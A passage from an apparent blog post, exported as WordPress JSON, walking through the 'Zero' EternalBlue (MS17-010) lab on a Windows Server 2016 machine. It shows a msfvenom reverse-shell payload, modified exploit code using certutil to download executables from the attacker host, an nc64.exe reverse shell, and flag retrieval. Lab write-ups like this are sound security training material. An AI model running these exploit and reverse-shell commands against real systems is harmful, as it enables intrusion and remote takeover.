...&quot;<\/code><\/pre>\n<p>Then generate a <code>shell.exe<\/code>:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/zero\/MS17-010]\n\u2514\u2500$ msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=192.168.10.104  LPORT=1234 -f exe -o shell.exe\n[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload\n[-] No arch selected, selecting arch: x86 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 354 bytes\nFinal size of exe file: 73802 bytes\nSaved as: shell.exe<\/code><\/pre>\n<p>Try running it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/zero\/MS17-010]\n\u2514\u2500$ python2 zzz_exploit_change.py 192.168.10.100\nTarget OS: Windows Server 2016 Standard Evaluation 14393\nUsing named pipe: netlogon\nTarget is 64 bit\nGot frag size: 0x20\nGROOM_POOL_SIZE: 0x5030\nBRIDE_TRANS_SIZE: 0xf90\nCONNECTION: 0xffffc4071a296020\nSESSION: 0xffffb4067522e790\nFLINK: 0xffffb406750a2098\nInParam: 0xffffb4067509616c\nMID: 0x3a03\nunexpected alignment, diff: 0xb098\nleak failed... 
try again\nCONNECTION: 0xffffc4071a296020\nSESSION: 0xffffb4067522e790\nFLINK: 0xffffb406750b1098\nInParam: 0xffffb406750ab16c\nMID: 0x3a03\nsuccess controlling groom transaction\nmodify trans1 struct for arbitrary read\/write\nmake this SMB session to be SYSTEM\noverwriting session security context\nOpening SVCManager on 192.168.10.100.....\nCreating service benf.....\nStarting service benf.....\nSCMR SessionError: code: 0x41d - ERROR_SERVICE_REQUEST_TIMEOUT - The service did not respond to the start or control request in a timely fashion.\nRemoving service benf.....\nDone<\/code><\/pre>\n<p>The shell never came back..... Let's try something other than the default approach:<\/p>\n<pre><code class=\"language-cmd\">certutil -a -urlcache -gmt -split -f http:\/\/192.168.10.104:8888\/shell.exe c:\\\\windows\\\\temp\\\\shell.exe<\/code><\/pre>\n<blockquote>\n<p><code>-a<\/code>                Process non-certificate data<\/p>\n<p><code>-f\t<\/code>               Overwrite existing files.<\/p>\n<p><code>-split<\/code>          Save to file.<\/p>\n<p><code>-URLCache<\/code>      Display or delete URL cache entries.<\/p>\n<\/blockquote>\n<pre><code class=\"language-python\">def smb_pwn(conn, arch):\n        # smbConn = conn.get_smbconnection()\n\n        # print(&#039;creating file c:\\\\pwned.txt on the target&#039;)\n        # tid2 = smbConn.connectTree(&#039;C$&#039;)\n        # fid2 = smbConn.createFile(tid2, &#039;\/pwned.txt&#039;)\n        # smbConn.closeFile(tid2, fid2)\n        # smbConn.disconnectTree(tid2)\n\n        # smb_send_file(smbConn, &#039;shell.exe&#039;, &#039;C&#039;, &#039;\/system.exe&#039;) \n        #service_exec(conn, r&#039;cmd \/c copy c:\\pwned.txt c:\\pwned_exec.txt&#039;)\n        service_exec(conn, r&#039;cmd \/c certutil -a -urlcache -gmt -split -f http:\/\/192.168.10.104:8888\/shell.exe 
c:\\\\windows\\\\temp\\\\shell.exe&#039;)\n        # Note: there are many methods to get shell over SMB admin session\n        # a simple method to get shell (but easily to be detected by AV) is\n        # executing binary generated by &quot;msfvenom -f exe-service ...&quot;<\/code><\/pre>\n<p>Then change one configuration option, namely the one the check step selects; any of them works, so I just picked one at random here:<\/p>\n<pre><code class=\"language-text\">samr: Ok (64 bit)\nnetlogon: Ok (64 bit)\nlsarpc: Ok (64 bit)<\/code><\/pre>\n<p>The result was another error:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/zero\/MS17-010]\n\u2514\u2500$ python2 zzz_exploit_change.py 192.168.10.100 netlogon\nTarget OS: Windows Server 2016 Standard Evaluation 14393\nTarget is 64 bit\nGot frag size: 0x20\nGROOM_POOL_SIZE: 0x5030\nBRIDE_TRANS_SIZE: 0xf90\nCONNECTION: 0xffffc407182ba020\nSESSION: 0xffffb406745019d0\nFLINK: 0xffffb406750ab098\nInParam: 0xffffb406750a216c\nMID: 0x2b03\nunexpected alignment, diff: 0x8098\nleak failed... 
try again\nCONNECTION: 0xffffc407182ba020\nSESSION: 0xffffb406745019d0\nFLINK: 0xffffb406750b7098\nInParam: 0xffffb406750b116c\nMID: 0x2b03\nsuccess controlling groom transaction\nmodify trans1 struct for arbitrary read\/write\nmake this SMB session to be SYSTEM\noverwriting session security context\nOpening SVCManager on 192.168.10.100.....\nCreating service JygC.....\nStarting service JygC.....\nSCMR SessionError: code: 0x41d - ERROR_SERVICE_REQUEST_TIMEOUT - The service did not respond to the start or control request in a timely fashion.\nRemoving service JygC.....\nDone<\/code><\/pre>\n<p>Meanwhile, the Python <code>http.server<\/code> on the other side received no request either...... Maybe because I went off to eat? Reboot the target! Still no good, so try changing the configuration options:<\/p>\n<pre><code class=\"language-python\">def smb_pwn(conn, arch):\n        # smbConn = conn.get_smbconnection()\n\n        # print(&#039;creating file c:\\\\pwned.txt on the target&#039;)\n        # tid2 = smbConn.connectTree(&#039;C$&#039;)\n        # fid2 = smbConn.createFile(tid2, &#039;\/pwned.txt&#039;)\n        # smbConn.closeFile(tid2, fid2)\n        # smbConn.disconnectTree(tid2)\n\n        # smb_send_file(smbConn, &#039;shell.exe&#039;, &#039;C&#039;, &#039;\/system.exe&#039;) \n        #service_exec(conn, r&#039;cmd \/c copy c:\\pwned.txt c:\\pwned_exec.txt&#039;)\n        service_exec(conn, r&#039;cmd \/c certutil -urlcache -gmt -split -f http:\/\/192.168.10.104:8888\/shell.exe c:\\\\windows\\\\temp\\\\shell.exe&#039;)\n        # Note: there are many methods to get shell over SMB admin session\n        # a simple method to get shell (but easily to be detected by AV) is\n        # executing binary generated by &quot;msfvenom -f exe-service 
...&quot;<\/code><\/pre>\n<p>This time it worked: don't use <code>-a<\/code>:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408102025191.png\" alt=\"image-20240810195857526\" \/><\/p>\n<p>Then try executing it:<\/p>\n<pre><code class=\"language-python\">def smb_pwn(conn, arch):\n        # smbConn = conn.get_smbconnection()\n\n        # print(&#039;creating file c:\\\\pwned.txt on the target&#039;)\n        # tid2 = smbConn.connectTree(&#039;C$&#039;)\n        # fid2 = smbConn.createFile(tid2, &#039;\/pwned.txt&#039;)\n        # smbConn.closeFile(tid2, fid2)\n        # smbConn.disconnectTree(tid2)\n\n        # smb_send_file(smbConn, &#039;shell.exe&#039;, &#039;C&#039;, &#039;\/system.exe&#039;) \n        #service_exec(conn, r&#039;cmd \/c copy c:\\pwned.txt c:\\pwned_exec.txt&#039;)\n        service_exec(conn, r&#039;cmd \/c c:\\\\windows\\\\temp\\\\shell.exe&#039;)\n        # Note: there are many methods to get shell over SMB admin session\n        # a simple method to get shell (but easily to be detected by AV) is\n        # executing binary generated by &quot;msfvenom -f exe-service ...&quot;<\/code><\/pre>\n<p>Forget it, still doesn't work; let's just upload <code>nc<\/code> the old-fashioned way:<\/p>\n<pre><code 
class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/zero\/MS17-010]\n\u2514\u2500$ wget https:\/\/github.com\/int0x33\/nc.exe\/blob\/master\/nc64.exe \n--2024-08-10 07:58:22--  https:\/\/github.com\/int0x33\/nc.exe\/blob\/master\/nc64.exe\nResolving github.com (github.com)... 20.205.243.166\nConnecting to github.com (github.com)|20.205.243.166|:443... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: unspecified [text\/html]\nSaving to: \u2018nc64.exe\u2019\n\nnc64.exe                                            [  &lt;=&gt;                                                                                                ] 285.33K  1.39MB\/s    in 0.2s    \n\n2024-08-10 07:58:23 (1.39 MB\/s) - \u2018nc64.exe\u2019 saved [292179]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/zero\/MS17-010]\n\u2514\u2500$ chmod +x *<\/code><\/pre>\n<p>Upload it and get the reverse shell:<\/p>\n<pre><code class=\"language-python\">service_exec(conn, r&#039;cmd \/c certutil -urlcache -gmt -split -f http:\/\/192.168.10.104:8888\/nc64.exe c:\\\\windows\\\\temp\\\\nc64.exe&#039;)\nservice_exec(conn, r&#039;cmd \/c c:\\\\windows\\\\temp\\\\nc64.exe -e cmd 192.168.10.104 1234&#039;)<\/code><\/pre>\n<p>Success!<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408102025192.png\" alt=\"image-20240810201827791\" \/><\/p>\n<p>But <code>pwncat-cs<\/code> stopped working again.....<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408102025193.png\" alt=\"image-20240810201901014\" \/><\/p>\n<p>Switch to another one:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408102025194.png\" alt=\"image-20240810201931266\" \/><\/p>\n<h2>Finding the flags<\/h2>\n<pre><code class=\"language-bash\">C:\\&gt;dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is E4E7-1761\n\n Directory of C:\\\n\n07\/16\/2016  06:18 AM    &lt;DIR&gt;          PerfLogs\n04\/15\/2024  
07:04 AM    &lt;DIR&gt;          Program Files\n01\/06\/2017  08:09 PM    &lt;DIR&gt;          Program Files (x86)\n04\/15\/2024  07:34 AM    &lt;DIR&gt;          Users\n08\/10\/2024  08:11 PM    &lt;DIR&gt;          Windows\n               0 File(s)              0 bytes\n               5 Dir(s)  21,073,338,368 bytes free\n\nC:\\&gt;cd Users\ncd Users\n\nC:\\Users&gt;dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is E4E7-1761\n\n Directory of C:\\Users\n\n04\/15\/2024  07:34 AM    &lt;DIR&gt;          .\n04\/15\/2024  07:34 AM    &lt;DIR&gt;          ..\n04\/15\/2024  07:04 AM    &lt;DIR&gt;          Administrator\n04\/15\/2024  07:04 AM    &lt;DIR&gt;          Public\n04\/15\/2024  07:34 AM    &lt;DIR&gt;          ruycr4ft\n               0 File(s)              0 bytes\n               5 Dir(s)  21,073,338,368 bytes free\n\nC:\\Users&gt;dir \/s *.txt\ndir \/s *.txt\n Volume in drive C has no label.\n Volume Serial Number is E4E7-1761\n\n Directory of C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadline\n\n04\/15\/2024  07:35 AM               307 ConsoleHost_history.txt\n               1 File(s)            307 bytes\n\n Directory of C:\\Users\\Administrator\\Desktop\n\n04\/15\/2024  07:32 AM                76 root.txt\n               1 File(s)             76 bytes\n\n Directory of C:\\Users\\All Users\\Microsoft\\Windows Defender\\Network Inspection System\\Support\n\n08\/10\/2024  02:45 PM             3,767 NisLog.txt\n               1 File(s)          3,767 bytes\n\n Directory of C:\\Users\\ruycr4ft\\Desktop\n\n04\/15\/2024  07:34 AM                58 user.txt\n               1 File(s)             58 bytes\n\n     Total Files Listed:\n               4 File(s)          4,208 bytes\n               0 Dir(s)  21,073,338,368 bytes free\n\nC:\\Users&gt;type C:\\Users\\ruycr4ft\\Desktop\\user.txt\ntype C:\\Users\\ruycr4ft\\Desktop\\user.txt\nHMV{XXXXXXXXXXXXXXXX}\n\nC:\\Users&gt;type 
C:\\Users\\Administrator\\Desktop\\root.txt\ntype C:\\Users\\Administrator\\Desktop\\root.txt\nHMV{XXXXXXXXXXXXXXXX}<\/code><\/pre>\n<h2>References<\/h2>\n<p><a href=\"https:\/\/youtube.com\/watch?v=9f_SOPJVFig\">https:\/\/youtube.com\/watch?v=9f_SOPJVFig<\/a><\/p>\n<p><a href=\"https:\/\/blog.zgsec.cn\/archives\/172.html?scroll=comment-160\">https:\/\/blog.zgsec.cn\/archives\/172.html?scroll=comment-160<\/a><\/p>\n<p><a href=\"https:\/\/blog.csdn.net\/yyyyyybw\/article\/details\/132741112?utm_medium=distribute.pc_relevant.none-task-blog-2~default~baidujs_baidulandingword~default-0-132741112-blog-120579915.235^v43^pc_blog_bottom_relevance_base5&amp;spm=1001.2101.3001.4242.1&amp;utm_relevant_index=3\">https:\/\/blog.csdn.net\/yyyyyybw\/article\/details\/132741112?utm_medium=distribute.pc_relevant.none-task-blog-2~default~baidujs_baidulandingword~default-0-132741112-blog-120579915.235^v43^pc_blog_bottom_relevance_base5&spm=1001.2101.3001.4242.1&utm_relevant_index=3<\/a><\/p>\n<p><a href=\"https:\/\/www.cnblogs.com\/backlion\/p\/7325228.html\">https:\/\/www.cnblogs.com\/backlion\/p\/7325228.html<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Zero An EternalBlue vulnerability lab where the script execution configuration has to be changed.... Information gathering Port scanning \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~ 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-779","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/779","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=779"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/779\/revisions"}],"predecessor-version":[{"id":780,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/779\/revisions\/780"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=779"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=779"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=779"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}